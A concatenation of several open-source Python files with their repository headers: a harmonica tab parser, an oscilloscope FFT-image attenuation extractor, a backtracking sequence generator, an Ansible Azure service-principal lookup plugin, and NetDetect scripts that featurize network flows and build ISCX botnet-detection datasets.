# All notes/holes_are separated by a space.
file_list_holes = line.split(' ')
for hole in file_list_holes:
note_name = hole
blow_draw = 'B'
if hole.startswith('-'):
blow_draw = 'D'
hole = hole[1:]
# Here we should validate if the hole can have the bending corresponding to one specific Key
# ( Note: This part at the momento i don't have certain if it changes with the key, I think that it can be
# constant for the hole in every key. That is the note changes but not the position!)
bending_type = 0 # No bendings!
if hole.endswith("'''"):
bending_type = 3
hole = hole[:-3]
elif hole.endswith("''"):
bending_type = 2
hole = hole[:-2]
elif hole.endswith("'"):
bending_type = 1
hole = hole[:-1]
hole_final = 1
#print('line_num: ' + str(line_num) + ' hole: ' + hole + ' note_name: ' + note_name)
if hole in ('0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '10'):
hole_final = hole
else:
return ('ERRO', 'Error at line "{}" "{}" the tab hole must be a num between 0 and 10 !'.format(line_num, note_name))
list_holes.append( ( note_name, int(hole_final), tab_const_note_duration, blow_draw, bending_type ) )
line_num += 1
music_score = ( '.tab', filename, title, key, list_holes )
return music_score
def parser_har_complex_music_file(filename):
data_lines = []
# Open the file for reading but closes automatically the file, even in the case of exception!
with open(filename, "r") as file:
data_lines = file.readlines()
# TODO: Implement!
music_score = ()
return music_score
if __name__ == "__main__":
# filename = 'ode_to_joy_by_beethoven.tab'
filename = 'music_10.tab'
filepath = './/music_for_hamonica//' + filename
music_score = parser_tab_simple_music_file(filepath)
print(music_score)
``` |
{
"source": "joaocarvalhoopen/Oscilloscope_frequency_response_correction_program",
"score": 2
} |
#### File: Siglent_SDS2104_Plus/Extract_attenuation_values_from_scope_FFT_image/extract_attenuation_values_from_scope_fft_image.py
```python
from PIL import Image
import math
import numpy as np
import csv
################
# Configurations
################
fileImgIn = "SDS2354Xplus_2GSa_8bit_1GHz.png"
# Flags that control the drawing of the markings.
flag_mark_4_corners_graph_limits = False # True False
flag_plot_extracted_signal_points = True # True False
flag_mark_left_grid_Y_points = True # True False
flag_mark_bottom_grid_X_points = True # True False
# The hex byte for each R, G, B component of the attenuation graph line color.
signalColorR = 0xB0
signalColorG = 0x14
signalColorB = 0xE8
# The hex byte for each R, G, B component of the color point extracted over
# the graph line.
outputSignalMarkerColorR = 0xFF
outputSignalMarkerColorG = 0xFF
outputSignalMarkerColorB = 0xFF
# The hex byte for each R, G, B component of the color of points of the extended
# first points of the graph line. This points are extended with the 0 dBV reference
# value, like points to the right, the flattest region in the signal graph line.
outputSignalMarkerInitialExtensionColorR = 0xFF
outputSignalMarkerInitialExtensionColorG = 0x00
outputSignalMarkerInitialExtensionColorB = 0x00
# The hex byte for each R, G, B component of the grid Y color point.
outputGrid_Y_MarkerColorR = 0x00
outputGrid_Y_MarkerColorG = 0xFF
outputGrid_Y_MarkerColorB = 0x00
# The hex byte for each R, G, B component of the grid X color point.
outputGrid_X_MarkerColorR = 0x00
outputGrid_X_MarkerColorG = 0xFF
outputGrid_X_MarkerColorB = 0x00
# FFT graph limits corners.
upperLeftX_GraphLimit = 18
upperLeftY_GraphLimit = 49
lowerRightX_GraphLimit = 872
lowerRightY_GraphLimit = 530
minX_GraphLimit = upperLeftX_GraphLimit
maxX_GraphLimit = lowerRightX_GraphLimit
minY_GraphLimit = upperLeftY_GraphLimit
maxY_GraphLimit = lowerRightY_GraphLimit
# Search zones.
upperLeftX = 34
upperLeftY = 110
downRightX = 82
downRightY = 157
zone_1 = (upperLeftX, upperLeftY, downRightX, downRightY)
upperLeftX = 83
upperLeftY = 110
downRightX = 872
downRightY = 530
zone_2 = (upperLeftX, upperLeftY, downRightX, downRightY)
zoneLst = [zone_1, zone_2]
######
# Grid
# Grid Y pixel values (pos Y in pixels, attenuation value in dbV, pixel difference from previous):
posY_dBV_table = [ (104, -12.0, 0),
(164, -14.0, 60),
(224, -16.0, 60),
(285, -18.0, 61),
(345, -20.0, 60),
(405, -22.0, 60),
(465, -24.0, 60),
(525, -26.0, 60),
(585, -28.0, 60)] # Note: The last data point was added by summing the inter
# points delta.
delta_dBV = 2.0
dbVOffset = posY_dBV_table[0][1]
min_Y_dBV_limit = (posY_dBV_table[0][0], posY_dBV_table[0][1] - dbVOffset)
max_Y_dBV_limit = (posY_dBV_table[-1][0], posY_dBV_table[-1][1] - dbVOffset)
# Grid X pixel values (pos X in pixels, frequency in MHz, pixel difference from previous):
bottomLineY = 530
posX_freq_table = [(18, 0.0, 0),
(104, 100.0, 86),
(190, 200.0, 86),
(275, 300.0, 85),
(360, 400.0, 85),
(445, 500.0, 85),
(531, 600.0, 86),
(616, 700.0, 85),
(701, 800.0, 85),
(787, 900.0, 86),
(872, 1000.0, 85)]
delta_freq = 100.0
#####################
# Fixed configuration
#####################
pathImgIn = ".//img_in//"
pathOut = ".//output_out//"
fileImgOut = "output_debug_img.png"
CSVFile_dbVAttenuationTable_OriginalFreq = "dbVAttenuationTable_OriginalFreq_0_to_1_GHz.csv"
CSVFile_dbVAttenuationTable_interpolated_1M_Step = "dbVAttenuationTable_interpol_1M_step_0_to_1_GHz.csv"
CSVFile_dbVAttenuationTable_interpolated_10M_Step = "dbVAttenuationTable_interpol_10M_step_0_to_1_GHz.csv"
# Constants
SHORT_TABLE_MODE = "SHORT_TABLE_MODE"
LONG_TABLE_MODE = "LONG_TABLE_MODE"
longTableHeaderCSV = ["Frequency MHz", "Attenuation dBV", "VoltsScaleFactor",
"Pixel X", "Pixel Y"]
shortTableHeaderCSV = longTableHeaderCSV[ :-2]
###########
# Functions
###########
def getImgInfo(img):
sizeX = img.size[0]
sizeY = img.size[1]
pixels = img.load() # Create the pixel map
return (sizeX, sizeY, pixels)
def processZone(pixelsIn, pixelsOut, zone):
# Extract the pixel points of a zone.
upperLeftX, upperLeftY, downRightX, downRightY = zone
pointPairLst = []
for x in range(upperLeftX, downRightX):
firstPointY = -1
counter = 0
for y in range(upperLeftY, downRightY):
pix = pixelsIn[x, y]
r = pix[0]
g = pix[1]
b = pix[2]
if r == signalColorR and g == signalColorG and b == signalColorB:
if (counter == 0):
firstPointY = y
counter += 1
if counter > 0:
calcY = float(firstPointY) + (float(counter - 1) / 2.0)
pointPairLst.append( [x, calcY] )
# pixelsOut[x, round(y)] = (outputSignalMarkerColorR,
# outputSignalMarkerColorG,
# outputSignalMarkerColorB)
return pointPairLst
def startingPointsExtender(pointsPairLst):
# This function extends the starting points from the first left pixel in "zone 1",
# flat zone wi 0 dB reference attenuation all the way to the zero frequency (0 Hz),
# starting graph X position.
startGraphPosX = minX_GraphLimit + 1
firstPoint = pointsPairLst[0]
endValueX, valueY = firstPoint
for x in range(endValueX, startGraphPosX, -1):
pointsPairLst.insert(0, [x, valueY])
return pointsPairLst
def extractSignalPixelPos(pixelsIn, pixelsOut, zoneLst):
# Extract the FFT line plot pixel positions of the PNG image.
lstPointPairs = []
for zone in zoneLst:
zonePoints = processZone(pixelsIn, pixelsOut, zone)
lstPointPairs += zonePoints
return lstPointPairs
def markPointsInOutputImg(pointsPairLst, pixelsOut):
# Add the marking over a copy of the input image for verification
# of correctness, rapid validation to help in development.
# Plot the 4 corners graph limits.
if flag_mark_4_corners_graph_limits == True:
points = [(minX_GraphLimit, minY_GraphLimit),
(minX_GraphLimit, maxY_GraphLimit),
(maxX_GraphLimit, minY_GraphLimit),
(maxX_GraphLimit, maxY_GraphLimit)]
for x, y in points:
pixelsOut[x, round(y)] = (outputSignalMarkerColorR,
outputSignalMarkerColorG,
outputSignalMarkerColorB)
# Plot or mark the extracted signal points.
if flag_plot_extracted_signal_points == True:
firstZone = 0
zone_0_lowerX, _, _ , _ = zoneLst[firstZone]
for pointsPair in pointsPairLst:
x, y = pointsPair
if x < zone_0_lowerX:
# Plot extension in Red color.
pixelsOut[x, round(y)] = (outputSignalMarkerInitialExtensionColorR,
outputSignalMarkerInitialExtensionColorG,
outputSignalMarkerInitialExtensionColorB)
else:
# Plot normal signal in White color.
pixelsOut[x, round(y)] = (outputSignalMarkerColorR,
outputSignalMarkerColorG,
outputSignalMarkerColorB)
# Mark the left grid Y points.
if flag_mark_left_grid_Y_points == True:
x = minX_GraphLimit
for val in posY_dBV_table:
y, dbV, pixelDiff_Y = val
pixelsOut[x, y] = (outputGrid_Y_MarkerColorR,
outputGrid_Y_MarkerColorG,
outputGrid_Y_MarkerColorB)
# Mark the bottom grid X points.
if flag_mark_bottom_grid_X_points == True:
y = maxY_GraphLimit
for val in posX_freq_table:
x, freq, pixelDiff_X = val
pixelsOut[x, y] = (outputGrid_X_MarkerColorR,
outputGrid_X_MarkerColorG,
outputGrid_X_MarkerColorB)
def calculateVoltfactor(dBV):
# 1 V = 0 dBv.
#
# The formula for Volts to dBv conversion is:
#
# dBV = 20 * log10( Volts )
#
# reverse formula for converting dBv to Volts is:
#
# Volts = 10 ^ ( dBV/20 )
voltScaleFactor = math.pow(10.0, dBV / 20.0)
return voltScaleFactor
def mapToFreq_and_dB(pointsPairLst, pixelsOut):
flag_function_debug = True
mappedOutPutPointsPairLst = []
dB_zero_point = pointsPairLst[zoneLst[0][0] - minX_GraphLimit + 1]
pos_Y_zero_dBV_ref = dB_zero_point[1]
print("pos_Y_zero_dBV_ref: ", str(pos_Y_zero_dBV_ref),
" --> dBV: 0.0 Volts scale factor: 1.0")
if flag_function_debug == True:
r = 0x00
b = 0x00
g = 0xFF
pixelsOut[dB_zero_point[0], pos_Y_zero_dBV_ref] = (r, g, b)
for point in pointsPairLst:
x, y = point
freq = (float(x - minX_GraphLimit) / float(maxX_GraphLimit - minX_GraphLimit) ) * 1000.0
dBV = (float(y - pos_Y_zero_dBV_ref ) / float(max_Y_dBV_limit[0] - min_Y_dBV_limit[0]) ) * ( max_Y_dBV_limit[1] - min_Y_dBV_limit[1] )
voltScaleFactor = calculateVoltfactor(dBV)
tupleVal = [freq, dBV, voltScaleFactor, x, y]
mappedOutPutPointsPairLst.append(tupleVal)
# Print values
# if 480 < freq < 600:
# print(tupleVal)
return mappedOutPutPointsPairLst
def getInterpolated_dB_for_freq(mappedPointsPairLst, freq, flag_print):
# Note:
# -3.01dBV = 0.7071 Volts
xFreqPoints = np.array([point[0] for point in mappedPointsPairLst])
y_dBV_Points = np.array([point[1] for point in mappedPointsPairLst])
# We use the interpolation in dBV and then calculate the Volts scale factor.
# y_VoltsScaleFactor_Points = np.array([calculateVoltfactor(point[1]) for
# point in mappedPointsPairLst])
# y_VoltsScaleFactor_Points = np.array([point[2] for point in mappedPointsPairLst])
# Perform the interpolation.
interp_dBV = np.interp(freq, xFreqPoints, y_dBV_Points)
interp_voltsFactor = calculateVoltfactor(interp_dBV)
#interp_voltsFactor = np.interp(freq, xFreqPoints, y_VoltsScaleFactor_Points)
if flag_print == True:
print("freq:", str(freq), " dBV:", str("%.4f" % interp_dBV), " Volts scale factor:",
str("%.4f" % interp_voltsFactor))
return (freq, interp_dBV, interp_voltsFactor)
def readFromCSVFile(inputPath, fileName):
headerRow = None
outputTable = []
with open(inputPath + fileName, mode='r', newline='') as csvFile:
tableReader = csv.reader(csvFile, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
flag_first_row = True
for row in tableReader:
if flag_first_row == True:
# Reading the header.
headerRow = row
flag_first_row = False
else:
# Reading the data rows.
outputTable.append(row)
print(', '.join(row))
return (headerRow, outputTable)
def writeToCSVFile(mappedPointsPairLst, pathOut, fileName, tableMode):
with open(pathOut + fileName, mode='w', newline='') as tableFile:
tableWriter = csv.writer(tableFile, delimiter=',', quotechar='"',
quoting=csv.QUOTE_MINIMAL )
# Writing the header.
if tableMode == SHORT_TABLE_MODE:
tableWriter.writerow(shortTableHeaderCSV)
elif tableMode == LONG_TABLE_MODE:
tableWriter.writerow(longTableHeaderCSV)
# Writing the rows.
for point in mappedPointsPairLst:
tableWriter.writerow(point)
# freq, dBV, voltsScaleFactor, x, y = point
# tableWriter.writerow([freq, dBV, voltsScaleFactor, x, y])
def calcFixedStepInterpolAttenuationTable(mappedPointsPairLst, freqStep,
freqRange, flag_print):
# Param: freqRange is a tuple "(startFreq, endFreq)".
if flag_print == True:
print("") # Just to add a "\n".
fixedStepTable = []
startFreq = freqRange[0]
endFreq = freqRange[1]
numIntervals = int((endFreq - startFreq + freqStep) / freqStep)
# Extend the range from 0Hz up to 1000MHz, so that interpolation work well.
tmpPointsPairLst = mappedPointsPairLst.copy()
# Insert synthetic 0 MHz with 0.0 dBV value in the begining.
tmpIndex = 0
tmpFreq = 0.0
tmp_dBV = 0.0
tmpPointsPairLst.insert(tmpIndex, [tmpFreq, tmp_dBV])
# Append to the end 1 synthetic data point, 1 MHz past the last real value with -100 dBV.
lastIndex = len(tmpPointsPairLst) - 1
tmpFreq = tmpPointsPairLst[lastIndex][0] + 1.0 # MHz
tmp_dBV = -100.0
tmpPointsPairLst.append([tmpFreq, tmp_dBV])
# Append to the end 1 synthetic data point at 1 GHz with -100 dBV.
tmpFreq = 1000 # MHz
tmp_dBV = -100.0
tmpPointsPairLst.append([tmpFreq, tmp_dBV])
for intervalIndex in range(0, numIntervals):
freq = startFreq + freqStep * intervalIndex
dataPoint = getInterpolated_dB_for_freq(tmpPointsPairLst, freq, flag_print)
fixedStepTable.append(dataPoint)
if flag_print == True:
print("") # Just to add a "\n".
return fixedStepTable
######
# Main
######
if __name__ == "__main__":
# Load the scope PNG image from file.
print("\nStarting...")
imgIn = Image.open(pathImgIn + fileImgIn)
print("...input scope PNG image loaded...\n")
imgOut = imgIn.copy()
# Image In and Out info.
sizeInX, sizeInY, pixelsIn = getImgInfo(imgIn)
sizeOutX, sizeOutY, pixelsOut = getImgInfo(imgOut)
pointsPairLst = extractSignalPixelPos(pixelsIn, pixelsOut, zoneLst)
pointsPairLst = startingPointsExtender(pointsPairLst)
markPointsInOutputImg(pointsPairLst, pixelsOut)
mappedPointsPairLst = mapToFreq_and_dB(pointsPairLst, pixelsOut)
flag_print = True
freq = 430.0 # MHz
val_3dBV = getInterpolated_dB_for_freq(mappedPointsPairLst, freq, flag_print)
freq = 500.0 # MHz
val_3dBV = getInterpolated_dB_for_freq(mappedPointsPairLst, freq, flag_print)
freq = 570.0 # MHz
val_3dBV = getInterpolated_dB_for_freq(mappedPointsPairLst, freq, flag_print)
print("")
writeToCSVFile(mappedPointsPairLst, pathOut,
CSVFile_dbVAttenuationTable_OriginalFreq, LONG_TABLE_MODE)
print("...output CSV graph original freq. attenuation file generated...")
# Note: Uncomment to test the reading of the file.
# CSVFromFiletable = readFromCSVFile( pathOut, CSVFile_dbVAttenuationTable_OriginalFreq)
# print(CSVFromFiletable)
freqStep = 10.0 # MHz
freqRange = (0.0, 1000.0) # MHz
flag_print = False
fixedStep_10M_attTable = calcFixedStepInterpolAttenuationTable(mappedPointsPairLst,
freqStep, freqRange, flag_print)
writeToCSVFile(fixedStep_10M_attTable, pathOut,
CSVFile_dbVAttenuationTable_interpolated_10M_Step, SHORT_TABLE_MODE)
print("...output CSV 10 MHz step interpolated attenuation (0 Hz to 1GHz) file generated...")
freqStep = 1.0 # MHz
freqRange = (0.0, 1000.0) # MHz
flag_print = False
fixedStep_1M_attTable = calcFixedStepInterpolAttenuationTable(mappedPointsPairLst,
freqStep, freqRange, flag_print)
writeToCSVFile(fixedStep_1M_attTable, pathOut,
CSVFile_dbVAttenuationTable_interpolated_1M_Step, SHORT_TABLE_MODE)
print("...output CSV 1 MHz step interpolated attenuation (0 Hz to 1GHz) file generated...")
# Write the debug extrated points validaion of the scope processed output PNG image.
imgOut.save(pathOut + fileImgOut)
print("...output extracted points validation scope processed PNG image file generated...")
print("...end\n")
``` |
{
"source": "joaocarvalhoopen/The_BackTracking_Algorithm",
"score": 4
} |
#### File: joaocarvalhoopen/The_BackTracking_Algorithm/sequence_generator.py
```python
import numpy as np
MAX_SEQUENCE_LENGTH = 4
SEQUENCE_ELEMENTS = ['A', 'B', 'C']
def printSequences(state, message):
print("\n" + message + "\n")
for seq in state:
# for i in range(0, MAX_SEQUENCE_LENGTH):
# print(seq[i], end='')
# if i == MAX_SEQUENCE_LENGTH-1:
# print()
print("".join(seq.tolist()))
def isSequenceStateConstrainsSatisfied(index, state):
# Check the constrains.
# Because we are building the solution iteratively, and the previous state with
# the previous sequence is correct and not conflicting, we only
# need to check if there current value is:
# -not equal to the previous value.
# Check if not equal to previous value.
if (index > 0):
if state[index - 1] == state[index]:
return False
return True
def solve(index_in, state, allSequenceSolution):
# Establish the stopping GOAL.
if index_in >= MAX_SEQUENCE_LENGTH:
allSequenceSolution.append(state.copy())
return True
# Give all the CHOICES to experiment incrementally.
newState = state.copy()
for choice in SEQUENCE_ELEMENTS:
newState[index_in] = choice
# Validate choice against CONSTRAINS.
if not isSequenceStateConstrainsSatisfied(index_in, newState):
# Removes the previous choice.
newState[index_in] = '_'
continue
# if valid, incrementally build the next solution phase.
solve(index_in + 1, newState, allSequenceSolution)
# Removes the previous choice.
newState[index_in] = '_'
if __name__ == "__main__":
print("\n######################################")
print( "# Sequence generator with constrains #")
print( "######################################")
# The '_' mark the places where we will put a sequence element!
sequenceLst = []
for i in range(0, MAX_SEQUENCE_LENGTH):
sequenceLst.append('_')
sequence = np.array(sequenceLst)
printSequences([sequence], "Empty sequence...")
index = 0
allSequenceSolution = []
solve(index, sequence, allSequenceSolution)
printSequences(allSequenceSolution, "All valid sequences...")
``` |
{
"source": "joaocc/azure_preview_modules",
"score": 2
} |
#### File: azure_rm_keyvaultsecret/lookup_plugins/azure_service_principal_attribute.py
```python
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = """
lookup: azure_service_principal_attribute
requirements:
- azure-graphrbac
author:
- <NAME> <<EMAIL>>
version_added: "2.7"
short_description: Look up Azure service principal attributes.
description:
- Describes object id of your Azure service principal account.
options:
azure_client_id:
description: azure service principal client id.
azure_secret:
description: azure service principal secret
azure_tenant:
description: azure tenant
azure_cloud_environment:
description: azure cloud environment
"""
EXAMPLES = """
set_fact:
object_id: "{{ lookup('azure_service_principal_attribute',
azure_client_id=azure_client_id,
azure_secret=azure_secret,
azure_tenant=azure_secret) }}"
"""
RETURN = """
_raw:
description:
Returns object id of service principal.
"""
from ansible.errors import AnsibleError
from ansible.plugins import AnsiblePlugin
from ansible.plugins.lookup import LookupBase
from ansible.module_utils._text import to_native
try:
from azure.common.credentials import ServicePrincipalCredentials
from azure.graphrbac import GraphRbacManagementClient
from msrestazure import azure_cloud
from msrestazure.azure_exceptions import CloudError
except ImportError:
raise AnsibleError(
"The lookup azure_service_principal_attribute requires azure.graphrbac, msrest")
class LookupModule(LookupBase):
def run(self, terms, variables, **kwargs):
self.set_options(direct=kwargs)
credentials = {}
credentials['azure_client_id'] = self.get_option('azure_client_id', None)
credentials['azure_secret'] = self.get_option('azure_secret', None)
credentials['azure_tenant'] = self.get_option('azure_tenant', 'common')
if credentials['azure_client_id'] is None or credentials['azure_secret'] is None:
raise AnsibleError("Must specify azure_client_id and azure_secret")
_cloud_environment = azure_cloud.AZURE_PUBLIC_CLOUD
if self.get_option('azure_cloud_environment', None) is not None:
cloud_environment = azure_cloud.get_cloud_from_metadata_endpoint(credentials['azure_cloud_environment'])
try:
azure_credentials = ServicePrincipalCredentials(client_id=credentials['azure_client_id'],
secret=credentials['azure_secret'],
tenant=credentials['azure_tenant'],
resource=_cloud_environment.endpoints.active_directory_graph_resource_id)
client = GraphRbacManagementClient(azure_credentials, credentials['azure_tenant'],
base_url=_cloud_environment.endpoints.active_directory_graph_resource_id)
response = list(client.service_principals.list(filter="appId eq '{0}'".format(credentials['azure_client_id'])))
sp = response[0]
return sp.object_id.split(',')
except CloudError as ex:
raise AnsibleError("Failed to get service principal object id: %s" % to_native(ex))
return False
``` |
{
"source": "joaoceron/NetDetect",
"score": 3
} |
#### File: MinimumFeaturizer/scripts/featurize_flows.py
```python
import sframe as sf
def generate_flows(input_url='data/scored_packets.csv', output_url="data/raw_flows.csv"):
'''
Generate raw network flows from a list of captured packets
'''
def __flow_id(x):
if x['Source'] > x['Destination']:
return x['Source'] + '-' + x['Destination'] + '-' + str(x['Source Port']) + '-' + str(x['Destination Port']) + '-' + str(x['Protocol'])
else:
return x['Destination'] + '-' + x['Source'] + '-' + str(x['Destination Port']) + '-' + str(x['Source Port']) + '-' + str(x['Protocol'])
sorted_flow = sf.SFrame.read_csv(input_url, verbose=False)
sorted_flow = sorted_flow[(sorted_flow['Source Port'] != '') & (sorted_flow['Destination Port'] != '')]
sorted_flow['tcp_Flags'] = sorted_flow['tcp_Flags'].apply(lambda x: int(x, 16) if x != '' else 0)
sorted_flow['UFid'] = sorted_flow.apply(lambda x: __flow_id(x))
sorted_flow = sorted_flow.sort(['UFid', 'Time'])
packet_flow_memberships = []
current_flow = 0
current_ufid = None
start_time = None
for row in sorted_flow:
if current_ufid is None:
if start_time is None:
start_time = row['Time']
packet_flow_memberships.append(current_flow)
current_ufid = row['UFid']
elif (row['UFid'] == current_ufid):
# Terminate connection.
if row['tcp_Flags'] & 1:
packet_flow_memberships.append(current_flow)
current_ufid = None
start_time = None
current_flow += 1
# Time-outs
# elif row['Time'] - startTime >= 360000:
# current_flow_id = current_flow_id + 1
# Flow.append(current_flow_id)
# prev_flow_id = None
# startTime = row['Time']
else:
packet_flow_memberships.append(current_flow)
current_ufid = row['UFid']
else:
current_flow = current_flow + 1
packet_flow_memberships.append(current_flow)
current_ufid = row['UFid']
start_time = row['Time']
sorted_flow['FlowNo.'] = sf.SArray(packet_flow_memberships)
sorted_flow.save(output_url)
def featurize_flows(input_url="data/raw_flows.csv", output_url="data/featurized_flows.csv"):
'''
Featurize network flows generated by generate_flows
'''
def __is_packet_null(x):
if (x['TCP Segment Len'] == '0' or x['udp_Length'] == 8):
return 1
elif ('ipx' in x['Protocols in frame'].split(':')):
l = x['Length'] - 30
if ('eth' in x['Protocols in frame'].split(':')):
l = l - 14
if ('ethtype' in x['Protocols in frame'].split(':')):
l = l - 2
if ('llc' in x['Protocols in frame'].split(':')):
l = l - 8
if (l == 0 or l == -1):
return 1
return 0
flow_list = sf.SFrame.read_csv(input_url, verbose=False)
# Add time feature, giving initial timestamp of the flow
# Use initial timestamp to fetch only first packets
FIRST_PACKETS = flow_list.join(flow_list.groupby(['FlowNo.'], {'Time': sf.aggregate.MIN('Time')}), on=['FlowNo.', 'Time'])[['FlowNo.', 'Length']].unique()
flow_list = flow_list.join(FIRST_PACKETS.groupby(['FlowNo.'], {'FirstPacketLength': sf.aggregate.AVG('Length')}), on='FlowNo.')
del(FIRST_PACKETS)
# Count number of packets per flow
flow_list = flow_list.join(flow_list.groupby(['FlowNo.'], {'NumberOfPackets': sf.aggregate.COUNT()}), on='FlowNo.')
# Total number of bytes exchanged
flow_list = flow_list.join(flow_list.groupby(['FlowNo.'], {'NumberOfBytes': sf.aggregate.SUM('Length')}), on='FlowNo.')
# Standard deviation of packet length
flow_list = flow_list.join(flow_list.groupby(['FlowNo.'], {'StdDevOfPacketLength': sf.aggregate.STDV('Length')}), on='FlowNo.')
# Porportion of packets with same length
flow_list = flow_list.join(
flow_list.groupby(['FlowNo.'], {
'RatioOfSameLengthPackets': sf.aggregate.COUNT_DISTINCT('Length') * 1.0 / sf.aggregate.COUNT()
}), on='FlowNo.')
# Calculate duration of flow
flow_list = flow_list.join(
flow_list.groupby(['FlowNo.'], {
'Duration': sf.aggregate.MAX('Time') - sf.aggregate.MIN('Time')
}), on='FlowNo.')
# Calculate average packets per second
flow_list['AveragePacketsPerSecond'] = flow_list.apply(lambda x: x['Duration'] if x['Duration'] == 0.0 else (x['NumberOfPackets'] * 1.0 / x['Duration']))
# Calculate number of bits per second
flow_list['AverageBitsPerSecond'] = flow_list.apply(lambda x: 0.0 if x['Duration'] == 0.0 else (x['NumberOfBytes'] * 8.0 / x['Duration']))
# Calculate average packet length
flow_list = flow_list.join(flow_list.groupby(['FlowNo.'], {'AveragePacketLength': sf.aggregate.AVG('Length')}), on='FlowNo.')
# Calculate null packets
flow_list['IsNull'] = flow_list.apply(lambda x: __is_packet_null(x))
# Calculate total number of null packets
flow_list = flow_list.join(flow_list.groupby(['FlowNo.'], {'NumberOfNullPackets': sf.aggregate.SUM('IsNull')}), on='FlowNo.')
# Added number of forward packets
flow_list['Forward'] = flow_list.apply(lambda x: 1 if x['Source'] > x['Destination'] else 0)
flow_list = flow_list.join(flow_list.groupby('FlowNo.', {'NumberOfForwardPackets': sf.aggregate.SUM('Forward')}), on='FlowNo.')
# Update flows
flow_list = flow_list.groupby('FlowNo.', {
'Score': sf.aggregate.SELECT_ONE('Score'),
'Destination': sf.aggregate.SELECT_ONE('Destination'),
'Destination Port': sf.aggregate.SELECT_ONE('Destination Port'),
'Source': sf.aggregate.SELECT_ONE('Source'),
'Source Port': sf.aggregate.SELECT_ONE('Source Port'),
'IP_Flags': sf.aggregate.SELECT_ONE('IP_Flags'),
'Length': sf.aggregate.SELECT_ONE('Length'),
'Protocol': sf.aggregate.SELECT_ONE('Protocol'),
'Protocols in frame': sf.aggregate.SELECT_ONE('Protocols in frame'),
'udp_Length': sf.aggregate.SELECT_ONE('udp_Length'),
'tcp_Flags': sf.aggregate.SELECT_ONE('tcp_Flags'),
'Time': sf.aggregate.SELECT_ONE('Time'),
'TCP Segment Len': sf.aggregate.SELECT_ONE('TCP Segment Len'),
'FirstPacketLength': sf.aggregate.SELECT_ONE('FirstPacketLength'),
'NumberOfPackets': sf.aggregate.SELECT_ONE('NumberOfPackets'),
'NumberOfBytes': sf.aggregate.SELECT_ONE('NumberOfBytes'),
'StdDevOfPacketLength': sf.aggregate.SELECT_ONE('StdDevOfPacketLength'),
'RatioOfSameLengthPackets': sf.aggregate.SELECT_ONE('RatioOfSameLengthPackets'),
'Duration': sf.aggregate.SELECT_ONE('Duration'),
'AveragePacketLength': sf.aggregate.SELECT_ONE('AveragePacketLength'),
'AverageBitsPerSecond': sf.aggregate.SELECT_ONE('AverageBitsPerSecond'),
'AveragePacketsPerSecond': sf.aggregate.SELECT_ONE('AveragePacketsPerSecond'),
'IsNull': sf.aggregate.SELECT_ONE('IsNull'),
'NumberOfNullPackets': sf.aggregate.SELECT_ONE('NumberOfNullPackets')
})
flow_list.save(output_url)
```
#### File: MinimumFeaturizer/scripts/featurize_packets.py
```python
import csv
headers = ['Source Port', 'Destination Port', 'Score', 'Source', 'Destination', 'Protocol', 'IP_Flags', 'Length', 'Protocols in frame', 'Time', 'tcp_Flags', 'TCP Segment Len', 'udp_Length']
def score_packets(input_url='data/raw_packets.csv', output_url='data/scored_packets.csv'):
'''
Adds score indicators to botnets
'''
print("Transforming initial data csv")
with open(output_url, 'w') as raw_flows:
writer = csv.writer(raw_flows, delimiter=',', quotechar='"', quoting=csv.QUOTE_ALL)
with open(input_url) as csvfile:
writer.writerow(headers + "Score")
first = True
for row in csv.reader(csvfile, delimiter=',', quotechar='"'):
if first is True:
first = False
continue
if row[headers.index('Label')] == "BENIGN":
row.append(0)
else:
row.append(1)
writer.writerow(row)
def featurize_packets(input_url='data/scored_packets.csv', output_url='data/featurized_packets.csv'):
'''
Featurizes packets
'''
pass
```
#### File: datasets/basic_iscx/generate.py
```python
from ..utils.network_utils import upload_file
from . import config, preprocess_file
from .logger import set_logger
import numpy as np
def main():
'''
Generates dataset out of ISCX.
'''
set_logger.info("Beginning ISCX dataset generation")
##############################
### Generate training dataset
# Preprocess file
train_X, train_Y = preprocess_file(
config.RAW_TRAINING_DATASET_PATH)
set_logger.info("Training dataset preprocessed.")
# Dumping training features
with open(config.DUMPS_DIR + "train_X_basic" + ".np",
'wb') as f:
np.save(f, np.array(train_X, dtype=np.float32))
set_logger.info("Training features dumped.")
del(train_X)
# Dumping training labels
with open(config.DUMPS_DIR + "train_Y_basic" + ".np",
'wb') as f:
np.save(f, np.array(train_Y))
set_logger.info("Training labels dumped.")
del(train_Y)
##############################
##############################
### Generate testing dataset
# Preprocess file
test_X, test_Y = preprocess_file(
config.RAW_TESTING_DATASET_PATH)
set_logger.info("Testing dataset preprocessed.")
# Dumping testing features
with open(config.DUMPS_DIR + "test_X_basic" + ".np",
'wb') as f:
np.save(f, np.array(test_X, dtype=np.float32))
set_logger.info("Testing features dumped.")
del(test_X)
# Dumping testing labels
with open(config.DUMPS_DIR + "test_Y_basic" + ".np",
'wb') as f:
np.save(f, np.array(test_Y))
set_logger.info("Testing labels dumped.")
del(test_Y)
##############################
##############################
### Upload files
upload_file("datasets", "iscx_train_X_basic",
config.DUMPS_DIR + "train_X_basic" + ".np")
upload_file("datasets", "iscx_train_Y_basic",
config.DUMPS_DIR + "train_Y_basic" + ".np")
upload_file("datasets", "iscx_test_X_basic",
config.DUMPS_DIR + "test_X_basic" + ".np")
upload_file("datasets", "iscx_test_Y_basic",
config.DUMPS_DIR + "test_Y_basic" + ".np")
##############################
return None
if __name__ == "__main__":
main()
```
#### File: datasets/iscx/generate.py
```python
from ..utils.network_utils import upload_file
from . import config, preprocess_file
from .logger import set_logger
import numpy as np
import argparse
def main(n_steps):
'''
Generates dataset out of ISCX.
'''
set_logger.info("Beginning ISCX dataset generation")
set_logger.info("Number of steps: " + str(n_steps))
##############################
### Generate training dataset
# Preprocess file
train_X, train_Y = preprocess_file(
config.RAW_TRAINING_DATASET_PATH, n_steps)
set_logger.info("Training dataset preprocessed.")
# Dumping training features
with open(config.DUMPS_DIR + "train_X_" + str(n_steps) + ".np",
'wb') as f:
np.save(f, np.array(train_X, dtype=np.float32))
set_logger.info("Training features dumped.")
del(train_X)
# Dumping training labels
with open(config.DUMPS_DIR + "train_Y_" + str(n_steps) + ".np",
'wb') as f:
np.save(f, np.array(train_Y))
set_logger.info("Training labels dumped.")
del(train_Y)
##############################
##############################
### Generate testing dataset
# Preprocess file
test_X, test_Y = preprocess_file(
config.RAW_TESTING_DATASET_PATH, n_steps)
